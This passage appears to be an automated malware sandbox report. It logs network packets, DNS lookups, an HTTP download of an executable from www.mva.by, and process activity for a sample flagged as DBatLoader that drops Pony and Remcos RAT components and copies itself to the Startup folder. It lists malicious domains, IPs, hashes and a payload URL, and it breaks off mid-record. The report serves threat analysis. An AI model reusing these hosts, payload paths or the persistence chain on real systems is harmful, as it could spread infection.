Dec 13, 2024 17:57:36.077033043 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.077090025 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.077169895 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.077222109 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.078176975 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.078224897 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.078305960 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.078351021 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.079375029 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.079427004 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.079476118 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.079518080 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.080504894 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.080554962 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.080616951 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.080660105 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.081722021 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.081773043 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.081856012 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.081903934 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.082884073 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.082935095 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.083002090 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.083041906 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.084156036 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.084211111 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.084369898 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.084415913 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.085263014 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.085311890 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.085387945 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.085429907 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.086474895 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.086527109 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.086584091 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.086625099 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.087627888 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.087673903 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.087933064 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.087980986 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.088835001 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.088922977 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.088942051 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.088969946 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.089978933 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.090029001 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.090121031 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.090163946 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.091185093 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.091236115 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.091294050 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.091335058 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.092348099 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.092397928 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.092456102 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.092498064 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.093620062 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.093653917 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.093672991 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.093703032 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.094767094 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.094819069 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.094898939 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.094945908 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.095927000 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.095987082 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.096041918 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.096084118 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.097111940 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.097166061 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.097222090 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.097265005 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.098783970 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.098838091 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.098933935 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.098982096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.099473000 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.099524975 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.099584103 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.099623919 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.100722075 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.100776911 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.100946903 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.101000071 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.101849079 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.101902008 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.101907969 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.101942062 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.103046894 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.103102922 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.103168964 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.103210926 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.104281902 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
                                              Dec 13, 2024 17:57:36.104337931 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.104434013 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.104477882 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.105400085 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.105451107 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.105493069 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.105534077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.106612921 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.106666088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.106667042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.106734037 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.107820988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.107880116 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.107964039 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.108006001 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.109006882 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.109061003 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.109142065 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.109189034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.110188961 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.110246897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.110346079 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.110397100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.111366987 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.111419916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.111421108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.111460924 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.112541914 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.112592936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.112693071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.112739086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.113737106 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.113794088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.113796949 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.113831997 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119427919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119472027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119507074 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119523048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119540930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119550943 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119568110 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119580984 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119580984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119616032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119620085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119652987 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119656086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119687080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119689941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119721889 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119728088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119766951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119812965 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119853973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.120857000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.120913982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.121006966 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.121052980 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.251672983 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.251746893 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.251827002 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.251866102 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.252166986 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.252223969 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:38.052309036 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.122534990 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:38.173753977 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:57:38.173839092 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.174794912 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.294711113 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:00.062073946 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:00.062381029 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.068757057 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.188782930 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:05.188868046 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.189475060 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.310067892 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:27.109210014 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:27.109281063 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.115509987 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.235481024 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:32.235654116 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.236208916 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.356228113 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:54.142338037 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:54.144011021 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.272525072 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.392981052 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:59.393063068 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.393579960 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.513472080 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:21.313380957 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:21.313452005 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.756294966 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.876904011 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:26.877001047 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.877943039 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.998816967 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:48.814245939 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:48.814383984 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.850042105 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.969845057 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:53.969922066 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.972078085 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:54.093417883 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:15.877485991 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:15.877598047 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:20.897536039 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.018790960 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:21.020725012 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.020725012 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.141593933 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:42.940135956 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:42.940319061 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:47.954816103 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.074760914 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:48.078318119 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.078830004 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.200527906 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:09.973051071 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:09.973258018 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:14.975331068 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.095690012 CET336049984154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:15.095792055 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.096357107 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.216562033 CET336049984154.16.63.197192.168.2.5
                                              Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                              Dec 13, 2024 17:57:32.279174089 CET  53798        53         192.168.2.5  1.1.1.1
                                              Dec 13, 2024 17:57:33.066862106 CET  53           53798      1.1.1.1      192.168.2.5
                                              Dec 13, 2024 17:57:41.729686975 CET  52761        53         192.168.2.5  1.1.1.1
                                              Dec 13, 2024 17:57:41.978154898 CET  53           52761      1.1.1.1      192.168.2.5
                                              Dec 13, 2024 17:57:57.190032005 CET  59722        53         192.168.2.5  1.1.1.1
                                              Dec 13, 2024 17:57:57.330642939 CET  53           59722      1.1.1.1      192.168.2.5
                                              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name        Type            Class        DNS over HTTPS
                                              Dec 13, 2024 17:57:32.279174089 CET  192.168.2.5  1.1.1.1  0xbfd0    Standard query (0)  www.mva.by  A (IP address)  IN (0x0001)  false
                                              Dec 13, 2024 17:57:41.729686975 CET  192.168.2.5  1.1.1.1  0xbddf    Standard query (0)  admino.ml   A (IP address)  IN (0x0001)  false
                                              Dec 13, 2024 17:57:57.190032005 CET  192.168.2.5  1.1.1.1  0x60ba    Standard query (0)  admino.ml   A (IP address)  IN (0x0001)  false
                                              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name        CName   Address        Type                    Class        DNS over HTTPS
                                              Dec 13, 2024 17:57:33.066862106 CET  1.1.1.1    192.168.2.5  0xbfd0    No error (0)    www.mva.by  mva.by  -              CNAME (Canonical name)  IN (0x0001)  false
                                              Dec 13, 2024 17:57:33.066862106 CET  1.1.1.1    192.168.2.5  0xbfd0    No error (0)    mva.by      -       93.125.99.121  A (IP address)          IN (0x0001)  false
                                              Dec 13, 2024 17:57:41.978154898 CET  1.1.1.1    192.168.2.5  0xbddf    Name error (3)  admino.ml   none    none           A (IP address)          IN (0x0001)  false
                                              Dec 13, 2024 17:57:57.330642939 CET  1.1.1.1    192.168.2.5  0x60ba    Name error (3)  admino.ml   none    none           A (IP address)          IN (0x0001)  false
                                              • www.mva.by
                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              0           192.168.2.5  49704        93.125.99.121   80                4084  C:\Users\user\Desktop\file.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Dec 13, 2024 17:57:33.290174007 CET  282                OUT        GET /tags/scan.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                              Host: www.mva.by
                                              Connection: Keep-Alive
                                              Dec 13, 2024 17:57:34.496464014 CET  1236               IN         HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 13 Dec 2024 16:57:34 GMT
                                              Content-Type: application/x-msdownload
                                              Content-Length: 853504
                                              Connection: keep-alive
                                              Last-Modified: Wed, 06 Jun 2018 00:46:15 GMT
                                              Accept-Ranges: bytes
                                              Cache-Control: max-age=259200
                                              Expires: Mon, 16 Dec 2024 16:57:34 GMT



                                              Target ID:0
                                              Start time:11:57:27
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.2049993958.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:11:57:35
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\SGS.exe"
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Temp\SGS.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 79%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:11:57:36
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:4
                                              Start time:11:57:36
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:11:57:40
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: pony, Description: Identify Pony, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:11:57:42
                                              Start date:13/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:11:57:42
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:11:57:45
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 74%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:11:57:51
                                              Start date:13/12/2024
